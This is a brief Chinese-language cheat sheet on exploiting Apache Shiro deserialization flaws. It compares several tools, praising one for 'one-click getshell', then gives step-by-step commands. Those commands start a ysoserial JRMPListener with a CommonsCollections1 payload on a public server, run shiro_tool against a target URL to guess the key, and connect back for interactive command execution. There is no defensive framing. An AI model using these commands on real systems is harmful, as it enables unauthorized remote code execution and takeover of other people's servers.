1、shiro反序列化漏洞综合利用工具

优点：图形化、傻瓜化工具，一键getshell

缺点：利用链少，回显方式少

2、ShiroExploit

基于ysoserial项目开发，payload多

3、ysoserial配合shiro_tool

ysoserial工具有多种payload

利用方式：

1、第一步

判断shiro利用链并在公网服务器起一个监听

java -cp ysoserial-master-8eb5cbfbf6-1.jar ysoserial.exploit.JRMPListener 8888 CommonsCollections1 "ping xxxx.dnslog.cn"

2、第二步

使用shiro_tool

java -jar shiro_tool.jar url

自动判断key，成功后出现交互式shell，可输入监听ip:port

3、第三步

在第二步的交互式shell中输入第一步的ip和端口

成功后即可执行命令